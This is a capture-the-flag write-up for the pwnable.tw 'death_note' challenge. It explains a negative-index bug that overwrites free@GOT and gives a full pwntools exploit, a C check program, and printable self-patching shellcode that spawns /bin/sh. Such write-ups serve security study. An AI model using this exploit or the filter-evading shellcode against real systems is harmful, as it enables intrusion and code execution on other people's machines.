1. Program function analysis
The usual three functions: add, show, delete.
Part highlighted in orange: the vulnerability. The index is only checked against the upper bound, never for negative values, so a negative index goes out of bounds before the start of the array (towards lower addresses) rather than past its end.
Part highlighted in red: the hard part of this challenge. Every byte written has to be a printable character.
The orange part first:
The note array lives in .bss at 0x0804A060. Anyone who has done a few of these knows the GOT sits in the same neighbourhood, and since the show and delete functions dereference note[index], a negative index lets you read or overwrite GOT entries such as puts and free; you only need to compute the matching offset. Here free@GOT is at 0x0804A014, so (0x0804A014 - 0x0804A060) / 4 = -19: note[-19] is free@GOT.
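As an added example (not part of the original writeup), the three constraints above computed rather than eyeballed, in C. It hand-assembles the shellcode listing into bytes (the encoding is mine and an assumption, not output captured from pwntools), checks every byte against a printable filter assumed to mean 0x20..0x7e, derives the index -19 from the two addresses, and simulates the xor self-patch that turns the appended "\x33\x7e" into int 0x80 (0xcd 0x80), assuming edx is 0 when the shellcode is entered, as the exploit's comments presume.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed for this example: the 32 bytes of the shellcode listing,
 * hand-assembled (an assumption, not pwntools output), followed by the two
 * bytes "\x33\x7e" that the exploit appends after asm(). */
static const uint8_t PAYLOAD[] = {
    0x6a, 0x68,                    /* push 0x68          -> "h\0\0\0"                     */
    0x68, 0x2f, 0x2f, 0x2f, 0x73,  /* push 0x732f2f2f    -> "///s"                        */
    0x68, 0x2f, 0x62, 0x69, 0x6e,  /* push 0x6e69622f    -> "/bin"                        */
    0x54, 0x5b,                    /* push esp ; pop ebx  ebx -> "/bin///sh"              */
    0x52, 0x4a, 0x4a,              /* push edx ; dec edx ; dec edx  (dl = 0xfe if edx was 0) */
    0x30, 0x50, 0x20,              /* xor byte [eax+32], dl                               */
    0x30, 0x50, 0x21,              /* xor byte [eax+33], dl                               */
    0x42, 0x42, 0x52, 0x59,        /* inc edx ; inc edx ; push edx ; pop ecx  (ecx = 0)   */
    0x6a, 0x40, 0x58, 0x34, 0x4b,  /* push 0x40 ; pop eax ; xor al, 0x4b (eax = 0xb = execve) */
    0x33, 0x7e,                    /* placeholder: 0x33^0xfe = 0xcd, 0x7e^0xfe = 0x80     */
};
enum { PATCH_OFF = 32 };

/* Filter described in the writeup: every byte of the name must be printable.
 * Assumed here to mean 0x20..0x7e inclusive. */
int is_printable_byte(uint8_t c) { return c >= 0x20 && c <= 0x7e; }

/* Offset of the first byte the filter would reject, or -1 if the buffer passes. */
int first_unprintable(const uint8_t *buf, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (!is_printable_byte(buf[i])) return (int)i;
    return -1;
}

/* note[] holds 4-byte pointers; an unchecked negative index reaches below the
 * array. Solve for the index that lands on a given GOT slot. */
int index_for_slot(uint32_t note_addr, uint32_t target) {
    return (int)(((int64_t)target - (int64_t)note_addr) / 4);
}

/* What the first instructions do to their own bytes once free@GOT is called
 * with eax pointing at the buffer (dl is 0xfe when edx was 0 on entry). */
void self_patch(uint8_t *buf, uint8_t dl) {
    buf[PATCH_OFF]     ^= dl;
    buf[PATCH_OFF + 1] ^= dl;
}

/* Patch a copy and return the two resulting bytes as one 16-bit value. */
unsigned patched_syscall_bytes(void) {
    uint8_t copy[sizeof PAYLOAD];
    memcpy(copy, PAYLOAD, sizeof copy);
    self_patch(copy, 0xfe);
    return (unsigned)copy[PATCH_OFF] << 8 | copy[PATCH_OFF + 1];
}

int main(void) {
    int idx = index_for_slot(0x0804a060u, 0x0804a014u);
    printf("note[%d] == free@GOT\n", idx);
    printf("payload length %zu, first unprintable byte: %d\n",
           sizeof PAYLOAD, first_unprintable(PAYLOAD, sizeof PAYLOAD));
    printf("bytes 32-33 after self-patch: %04x (int 0x80)\n", patched_syscall_bytes());
    return 0;
}
```

The point of the last check is the whole difficulty of the challenge: 0xcd 0x80 fail the printable filter on their own, so the shellcode has to smuggle them in as 0x33 0x7e and repair them at runtime, which only works because the buffer it lives in is executable and eax points at it when free() is called.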
#!/usr/bin/env python
# coding=utf-8
from pwn import *

debug = 1
online = 1
context(arch='i386', os='linux', log_level='debug')
context.terminal = ["tmux", "split", "-h"]
elf = ELF("./death_note")

if online == 0:
    io = process("./death_note")
else:
    io = remote("chall.pwnable.tw", 10201)

rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
dbg = lambda text=None: gdb.attach(io, text)
lg = lambda s, addr: log.info("\033[1;31;40m %s --> 0x%x \033[0m" % (s, addr))
uu32 = lambda data: u32(data.ljust(4, b"\x00"))
uu64 = lambda data: u64(data.ljust(8, b"\x00"))


def AddNote(index, name):
    sla("Your choice :", "1")
    sla("Index :", str(index))
    sla("Name :", name)


def DeleteNote(index):
    sla("Your choice :", "3")
    sla("Index :", str(index))


def main():
    free_got = 0x0804A014   # free@GOT
    note_addr = 0x0804A060  # note[] in .bss
    # note[] is an array of 4-byte pointers, so the unchecked negative index
    # (free_got - note_addr) // 4 == -19 makes note[-19] alias free@GOT.
    idx = (free_got - note_addr) // 4

    # Printable shellcode. It relies on eax holding the buffer's address on
    # entry (the argument handed to free) and on edx being 0.
    shellcode = '''
    /* ebx -> '/bin///sh' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    push esp
    pop ebx
    /* edx = 0xfffffffe, i.e. dl = 0xfe */
    push edx
    dec edx
    dec edx
    /* patch bytes 32-33 of this buffer: 0x33 0x7e ^ 0xfe -> 0xcd 0x80 (int 0x80) */
    xor [eax+32], dl
    xor [eax+33], dl
    /* edx = ecx = 0 */
    inc edx
    inc edx
    push edx
    pop ecx
    /* eax = 0x40 ^ 0x4b = 0x0b (execve) */
    push 0x40
    pop eax
    xor al,0x4b
    '''
    # The asm above is exactly 32 bytes, so "\x33\x7e" lands at offset 32;
    # int 0x80 itself (cd 80) would not pass the printable-character check.
    AddNote(idx, asm(shellcode) + b"\x33\x7e")
    DeleteNote(idx)  # free(note[-19]) now jumps through the patched GOT entry into the shellcode
    io.interactive()


if __name__ == "__main__":
    main()
An alternative version of the shellcode with the same structure (the patched bytes sit at offsets 36 and 37 here, and eax is built from ecx with eleven inc instructions, so it comes out as 11 only when ecx is 0 on entry):

shellcode = '''
/* push ebx first: its bytes end up right after the string built below */
push ebx
push 0x68732f2f
push 0x6e69622f
push esp
pop ebx
/* dl = 0xfe, patch the two placeholder bytes at offsets 36-37 */
push edx
dec edx
dec edx
xor [eax+36], dl
xor [eax+37], dl
pop edx
/* eax = ecx + 11 */
push ecx
pop eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
inc eax
'''
References:
https://p1kk.github.io/2020/09/10/tw/tw%20death_note/
https://blog.csdn.net/qq_43189757/article/details/103100883